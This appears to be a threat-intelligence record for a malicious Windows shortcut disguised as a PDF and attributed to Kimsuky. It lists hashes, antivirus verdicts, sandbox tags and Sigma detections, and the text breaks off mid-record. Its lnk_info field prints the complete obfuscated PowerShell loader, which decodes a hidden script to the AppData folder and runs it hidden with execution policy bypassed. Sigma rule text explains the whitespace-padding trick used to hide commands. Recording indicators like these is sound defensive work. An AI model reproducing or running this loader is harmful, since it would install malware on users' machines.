aa9d5dd632bb90addca480eaa5ff4382
Hash
- MD5: aa9d5dd632bb90addca480eaa5ff4382
- SHA1: 5746f3e78351439caebfa3721e8feea36b67263f
- SHA256: 4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2
- First Seen: 2026-05-15
- Last Seen: 2026-05-15
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2"
},
"attributes": {
"reputation": -143,
"type_tags": [
"windows",
"lnk"
],
"last_analysis_date": 1775023447,
"times_submitted": 2,
"popular_threat_classification": {
"suggested_threat_label": "trojan.pantera/kimsuky",
"popular_threat_name": [
{
"count": 7,
"value": "pantera"
},
{
"count": 5,
"value": "kimsuky"
},
{
"count": 2,
"value": "etset"
}
],
"popular_threat_category": [
{
"count": 19,
"value": "trojan"
},
{
"count": 3,
"value": "downloader"
}
]
},
"md5": "aa9d5dd632bb90addca480eaa5ff4382",
"type_description": "Windows shortcut",
"names": [
"PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.lnk",
"PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.lnk.unkc"
],
"unique_sources": 2,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "2.0.0.1",
"engine_update": "20260331",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260401",
"category": "malicious",
"result": "lnk.trojan.kimsuky"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260331",
"category": "malicious",
"result": "Lnk.Trojan.A24315479"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260331",
"category": "malicious",
"result": "BehavesLike.Trojan.gl"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.214",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260331",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260330",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.44.59057",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.44.59057",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "61bd315:61bd315:389d672:389d672",
"engine_update": "20260331",
"category": "malicious",
"result": "HEUR:Trojan/LNK.Agent.b"
},
"Baidu": {
"method": "blacklist",
"engine_name": "Baidu",
"engine_version": "1.0.0.2",
"engine_update": "20190318",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1177",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260401",
"category": "malicious",
"result": "CL.Downloader!gen211"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260401",
"category": "malicious",
"result": "LNK/Kimsuky.AA trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260401",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "malicious",
"result": "LNK:Kimsuky-K [Trj]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260401",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260401",
"category": "malicious",
"result": "HEUR:Trojan.WinLNK.Agent.gen"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.3.1.0",
"engine_update": "20260401",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260401",
"category": "malicious",
"result": "LNK.Downloader.1051"
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5572",
"engine_update": "20260330",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260401",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14228",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7 (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260331",
"category": "malicious",
"result": "Trojan-Downloader.PS.Agent"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44063AVA:64.30942",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1775019711",
"engine_update": "20260401",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan/Win32.Etset"
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.242.174",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38530",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260401",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.1A1B5CD7"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.23-113519295",
"engine_update": "20260401",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26020.3",
"engine_update": "20260401",
"category": "malicious",
"result": "Trojan:Win32/Etset!rfn"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260401",
"category": "malicious",
"result": "LNK/ABTrojan.CCMC-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.29.3.10609",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.5.1",
"engine_update": "20260331",
"category": "malicious",
"result": "Trojan.Link.Crafted"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-04-01.01",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260401",
"category": "malicious",
"result": "Win32.Trojan.Zdi-can-25373.Kqil"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260331",
"category": "malicious",
"result": "Trojan-JACI!AA9D5DD632BB"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.30.0",
"engine_update": "20260401",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "malicious",
"result": "LNK:Kimsuky-K [Trj]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260331",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/Kimsuky.V"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260330-04",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20251216",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.255",
"engine_update": "20260327",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.764",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260401",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.11.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260401",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260401",
"category": "type-unsupported",
"result": null
}
},
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"sha256": "4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2",
"last_submission_date": 1773472268,
"size": 420794,
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 72
},
"Yomi Hunter": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Yomi Hunter"
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"first_submission_date": 1773431430,
"vhash": "fd332a119edee710ad36055b2def06f8",
"last_analysis_stats": {
"malicious": 36,
"suspicious": 0,
"undetected": 26,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"last_modification_date": 1778745576,
"sha1": "5746f3e78351439caebfa3721e8feea36b67263f",
"meaningful_name": "PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.lnk",
"first_seen_itw_date": 1773484316,
"tags": [
"executes-dropped-file",
"long-command-line-arguments",
"long-sleeps",
"detect-debug-environment",
"hiding-window",
"high-entropy",
"abused-exe-pattern",
"large-file",
"lnk"
],
"total_votes": {
"harmless": 0,
"malicious": 5
},
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 163 143 142 34 19 51 67 60 44 80 54 44 54 103 104 156 193 189 122 104 92 101 33 18 25 123 104 83 115 86 44 42 46 46 90 180 155 101 119 100 103 36 34 90 86 68 43 43 46 46 57 34 44 87 109 108 156 109 101 111 101 76 99 52 62 54 99 117 57 54 31 50 145 109 118 87 141 96 164 79 34 15 61 59 77 76 95 54 77 35 70 125 103 137 126 106 111 124 31 65 84 101 121 51 73 103 88 46 109 86 161 127 108 86 107 140 179 31 19 101 125 135 40 48 117 117 124 28 87 163 182 189 155 187 158 179 88 101 92 134 55 122 117 117 63 124 100 111 78 179 120 97 105 97 96 101 92 101 70 52 122 117 117 45 57 109 102 163 111 124 91 111 167 170 101 19 101 125 135 55 50 117 117 124 27 99 98 191 180 168 110 92 166 101 92 101 70 55 122 117 117 63 48 43 34 87 191 180 168 113 100 112 101 92 101 57 69 56 126 108 126 101 92 100 163 182 189 104 113 96 101 88 35 24 134 126 122 61 117 117 124 88 98 88 191 180 168 124 167 170 101 30 25 121 135 97 124 37 45 42 29 84 161 127 108 86 107 158 179 17 30 34 49 123 44 60 49 126 99 107 41 83 110 191 141 189 137 90 70 18 19 64 58 42 55 29 63 42 38 34 87 164 189 86 110 94 112 25 103 99 52 62 54 126 92 45 44 37 40 97 126 162 168 121 86 110 31 29 28 65 68 49 54 47 57 57 40 44 94 124 120 88 187 142 148 36 36 34 56 53 95 126 54 48 46 35 40 98 128 107 97 110 91 166 17 25 35 122 66 51 44 47 43 60 97 27 146 179 109 105 102 167 88 76 62 25 50 58 49 59 106 73 57 45 63 96 112 106 101 106 85 181 90 50 21 63 137 120 46 36 44 44 111 100 125 124 126 102 120 87 98 103 99 31 54 54 124 115 72 43 42 73 40 89 124 191 166 117 97 109 76 97 103 132 65 52 56 92 124 46 31 33 165 164 191 128 110 96 103 90 55 38 52 65 124 120 115 59 48 25 87 132 113 111 134 124 85 116 94 103 101 49 72 48 59 105 48 43 94 111 138 193 187 87 105 87 181 74 103 96 132 72 59 63 119 99 126 69 34 92 115 178 122 124 85 109 103 95 99 67 59 38 102 86 48 46 75 48 81 128 182 170 187 102 102 28 20 89 56 54 107 126 92 128 122 45 30 85 164 189 163 178 165 115 20 19 21 125 130 106 114 35 40 42 109 86 161 121 108 90 160 137 90 70 18 19 64 58 42 55 29 63 42 38 34 87 164 189 86 110 94 112 25 103 96 125 133 40 53 49 117 119 109 86 95 111 117 103 160 167 109 35 29 32 99 87 87 46 46 44 103 87 94 81 120 106 168 162 136 114 36 34 23 52 108 122 63 39 48 50 38 46 100 109 118 91 111 154 95 25 35 89 65 64 40 56 34 62 112 25 94 151 111 126 83 187 76 154 62 25 17 57 62 55 115 64 59 60 61 44 84 108 122 87 105 169 168 50 21 30 136 133 58 45 39 128 113 71 44 100 125 122 88 106 169 177 31 20 23 136 124 77 43 35 90 53 35 44 165 189 126 105 124 142 130 19 38 21 52 124 76 46 40 61 57 28 30 165 113 112 83 120 87 98 31 34 27 60 137 111 95 37 57 41 34 44 87 109 147 97 106 85 181 101 90 57 57 89 42 49 49 55 50 42 113 152 156 103 101 122 84 97 30 24 25 88 58 48 55 52 39 126 77 24 85 128 108 87 189 156 143 30 27 34 136 133 59 63 54 126 126 98 58 92 115 123 91 102 118 97 14 27 34 136 97 51 60 51 59 48 84 106 138 193 187 87 105 87 181 11 103 56 51 53 111 90 46 52 57 111 100 127 120 115 101 141 104 97 31 103 99 56 57 44 128 106 91 48 44 34 97 120 113 99 189 116 129 65 79 76 136 133 59 61 35 55 47 33 113 136 193 145 101 102 156 130 36 31 34 68 52 48 59 51 76 61 28 38 132 126 107 97 110 91 181 90 66 15 67 70 39 44 50 128 119 63 34 78 124 109 119 117 100 105 27 89 34 48 68 117 128 106 95 44 40 28 88 124 113 86 189 162 168 48 30 25 68 58 37 77 35 39 50 42 113 125 120 123 102 120 91 181 90 25 24 56 137 124 115 73 49 48 70 35 81 124 109 105 122 85 108 17 34 103 123 91 45 80 37 49 56 38 37 96 193 178 133 101 100 114 18 19 30 57 59 76 49 43 55 59 22 113 131 104 111 105 106 86 181 90 68 24 59 60 59 50 51 128 124 105 113 74 189 126 104 122 169 152 103 61 24 63 59 111 80 54 44 54 111 105 161 124 113 84 163 136 101 23 67 38 52 72 115 128 59 126 39 46 37 96 179 111 87 172 109 179 76 97 103 132 72 58 61 92 35 124 104 86 165 189 107 88 116 98 110 34 21 103 107 137 78 59 32 115 75 44 41 96 125 106 94 120 101 129 38 20 28 84 55 51 57 48 59 44 111 100 118 115 124 101 189 156 148 19 103 95 97 68 40 115 83 63 42 42 104 151 160 123 102 144 96 103 18 19 34 53 129 107 107 110 128 113 61 44 85 124 107 97 105 96 102 25 62 25 52 68 42 42 54 52 126 103 67 96 106 178 118 116 92 112 52 23 38 58 137 111 83 46 50 41 27 44 82 193 169 154 180 142 181 99 20 34 52 53 51 50 48 45 126 82 113 119 124 104 157 138 102 109 34 35 18 60 68 56 76 54 45 51 60 44 81 109 118 92 118 86 130 34 19 103 123 97 51 60 51 59 48 84 113 115 124 120 97 106 85 112 21 90 52 69 65 55 60 34 52 57 43 61 100 110 116 170 176 117 116 20 28 57 71 60 55 128 117 81 48 42 77 83 120 105 101 189 119 112 23 24 21 52 64 46 57 119 76 61 28 38 152 157 155 134 176 152 168 83 90 85 119 124 103 109 98 110 101 92 89 144 180 170 151 169 148 162 81 84 83 123 116 105 107 99 109 104 91 92 140 180 170 149 167 153 164 101 103 90 103 70 40 55 40 50 126 107 48 98 109 118 91 111 169 168 51 21 30 65 66 55 46 119 124 42 29 40 94 122 122 88 189 156 130 34 19 19 63 59 53 45 119 124 43 42 29 81 120 113 99 106 142 177 38 38 38 136 108 124 86 40 55 48 98 65 100 109 119 170 181 165 112 25 17 77 103 57 44 92 54 44 61 102 113 163 127 111 84 112 100 167 23 20 86 134 110 120 46 36 44 44 82 109 99 110 107 88 178 167 164 89 19 15 52 135 97 87 41 42 47 36 44 152 138 122 104 139 100 100 18 34 20 52 137 111 75 37 55 126 107 31 82 109 109 170 176 129 112 38 35 34 54 54 124 124 47 46 43 111 100 118 108 107 132 116 93 112 103 99 38 71 72 97 122 119 124 61 46 48 138 143 122 93 110 83 112 90 62 19 67 60 124 115 71 63 42 39 113 161 148 102 129 111 83 102 36 38 19 63 58 46 114 74 39 91 32 36 88 128 113 102 175 121 116 19 31 103 123 99 45 46 52 59 99\\\";$Length = $VIUSBvejbawf.Length;$CLOIJSfgiojvosef235sdb = New-Object System.Collections.ArrayList;[string] $date = $null;$m = 0;for($k = 0; $k -lt $Length; $k++){$date += $VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \\\" \\\"){[void]$CLOIJSfgiojvosef235sdb.Add([byte] $date);$m++;$date = $null;continue;}}$Apkengsidefg = \\\"AB59097(*^zxcvbn \\\";[Byte[]]$pw = [System.Text.Encoding]::UTF8.GetBytes(\\\"$Apkengsidefg\\\");\r\n$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]($CLOIJSfgiojvosef235sdb.Count);$j = 0;for($i = 0; $i -lt $CLOIJSfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;if($pw_num -ge $CLOIJSfgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num - $CLOIJSfgiojvosef235sdb[$i];}else{$MFibvfaibfeg2345fbdfg[$i] = $CLOIJSfgiojvosef235sdb[$i];}$j++;if($j -eq $pw_Length){$j = 0;}}$qqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg2345fbdfg);$fgfw98JHGVfeg = \\\"$env:appdata\\firefox.ps1\\\";$qqpvm|Out-File -FilePath $fgfw98JHGVfeg;powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;\"\r\n",
"icon_location": "%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 1,
"medium": 5,
"low": 5
}
},
"ssdeep": "192:88q56shgC/bYXMEfdMlGLgkGvbkqW4vvff2qjQB5cU+rcfuWYKlJOcIl7Il7Il7s:Zq3IWSJRfuWYG3",
"type_extension": "lnk",
"filecondis": {
"raw_md5": "49a68431d9647f2ce4370cf3f4b57281",
"dhash": "b3a0b49a90a2a282"
},
"type_tag": "lnk",
"tlsh": "T117947021F6FC4D31ED2A799264FC1DF0ACE64FB418851E5F0C32BA68635EA80FD95249",
"magika": "LNK",
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"132 65 52 56 90 86 47 38 35 152 145 126 86 117 169 173 44 52 14 53 53 55 51 105 87 79 97 65 100 109 119 109 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
